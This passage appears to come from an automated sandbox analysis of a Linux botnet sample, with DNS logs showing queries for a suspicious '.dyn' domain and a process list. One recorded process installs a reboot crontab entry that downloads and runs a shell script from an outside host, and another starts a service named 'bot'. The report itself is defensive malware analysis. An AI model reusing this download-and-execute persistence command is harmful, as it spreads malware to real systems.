                Dec 17, 2024 19:34:05.102636099 CET5342283194.36.144.87192.168.2.13
                Dec 17, 2024 19:34:06.578912020 CET3584853192.168.2.138.8.8.8
                Dec 17, 2024 19:34:06.579026937 CET5231753192.168.2.138.8.8.8
                Dec 17, 2024 19:34:06.703000069 CET53523178.8.8.8192.168.2.13
                Dec 17, 2024 19:34:06.713562012 CET53358488.8.8.8192.168.2.13
                TimestampSource IPDest IPChecksumCodeType
                Dec 17, 2024 19:32:59.819156885 CET10.56.104.98192.168.2.13605e(Host unreachable)Destination Unreachable
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Dec 17, 2024 19:32:59.519797087 CET192.168.2.1351.158.108.2030x4181Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                Dec 17, 2024 19:33:04.526390076 CET192.168.2.13185.181.61.240x5f46Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                Dec 17, 2024 19:33:12.227210999 CET192.168.2.13168.235.111.720xa527Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                Dec 17, 2024 19:33:20.015755892 CET192.168.2.13178.254.22.1660xd717Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                Dec 17, 2024 19:33:25.022561073 CET192.168.2.1381.169.136.2220x7d9cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                Dec 17, 2024 19:33:32.689692974 CET192.168.2.13139.84.165.1760x22e9Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                Dec 17, 2024 19:33:37.696064949 CET192.168.2.13168.235.111.720x172bStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                Dec 17, 2024 19:33:45.464850903 CET192.168.2.1351.158.108.2030x7e9eStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                Dec 17, 2024 19:33:50.472922087 CET192.168.2.135.161.109.230xd873Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                Dec 17, 2024 19:33:55.480180025 CET192.168.2.13137.220.52.230x4c66Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                Dec 17, 2024 19:34:00.486572981 CET192.168.2.1381.169.136.2220x8b01Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                Dec 17, 2024 19:34:06.578912020 CET192.168.2.138.8.8.80xd14dStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                Dec 17, 2024 19:34:06.579026937 CET192.168.2.138.8.8.80x3f5aStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Dec 17, 2024 19:33:04.786268950 CET185.181.61.24192.168.2.130x5f46No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                Dec 17, 2024 19:33:04.786268950 CET185.181.61.24192.168.2.130x5f46No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                Dec 17, 2024 19:33:12.546765089 CET168.235.111.72192.168.2.130xa527No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                Dec 17, 2024 19:33:12.546765089 CET168.235.111.72192.168.2.130xa527No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                Dec 17, 2024 19:33:25.261657000 CET81.169.136.222192.168.2.130x7d9cNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                Dec 17, 2024 19:33:25.261657000 CET81.169.136.222192.168.2.130x7d9cNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                Dec 17, 2024 19:33:38.013082981 CET168.235.111.72192.168.2.130x172bNo error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                Dec 17, 2024 19:33:38.013082981 CET168.235.111.72192.168.2.130x172bNo error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                Dec 17, 2024 19:34:00.725560904 CET81.169.136.222192.168.2.130x8b01No error (0)kingstonwikkerink.dyn80.78.26.121A (IP address)IN (0x0001)false
                Dec 17, 2024 19:34:00.725560904 CET81.169.136.222192.168.2.130x8b01No error (0)kingstonwikkerink.dyn212.64.215.71A (IP address)IN (0x0001)false
                Dec 17, 2024 19:34:06.713562012 CET8.8.8.8192.168.2.130xd14dNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                Dec 17, 2024 19:34:06.713562012 CET8.8.8.8192.168.2.130xd14dNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                System Behavior

                Start time (UTC):18:32:58
                Start date (UTC):17/12/2024
                Path:/tmp/nshkarm7.elf
                Arguments:/tmp/nshkarm7.elf
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):18:32:58
                Start date (UTC):17/12/2024
                Path:/tmp/nshkarm7.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):18:32:58
                Start date (UTC):17/12/2024
                Path:/bin/sh
                Arguments:/bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):18:32:58
                Start date (UTC):17/12/2024
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):18:32:58
                Start date (UTC):17/12/2024
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):18:32:58
                Start date (UTC):17/12/2024
                Path:/usr/bin/crontab
                Arguments:crontab -l
                File size:43720 bytes
                MD5 hash:66e521d421ac9b407699061bf21806f5

                Start time (UTC):18:32:58
                Start date (UTC):17/12/2024
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):18:32:58
                Start date (UTC):17/12/2024
                Path:/usr/bin/crontab
                Arguments:crontab -
                File size:43720 bytes
                MD5 hash:66e521d421ac9b407699061bf21806f5

                Start time (UTC):18:32:58
                Start date (UTC):17/12/2024
                Path:/tmp/nshkarm7.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):18:32:58
                Start date (UTC):17/12/2024
                Path:/bin/sh
                Arguments:/bin/sh -c "/sbin/initctl start bot"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):18:32:58
                Start date (UTC):17/12/2024
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):18:32:58
                Start date (UTC):17/12/2024
                Path:/tmp/nshkarm7.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):18:32:59
                Start date (UTC):17/12/2024
                Path:/tmp/nshkarm7.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):18:32:58
                Start date (UTC):17/12/2024
                Path:/tmp/nshkarm7.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1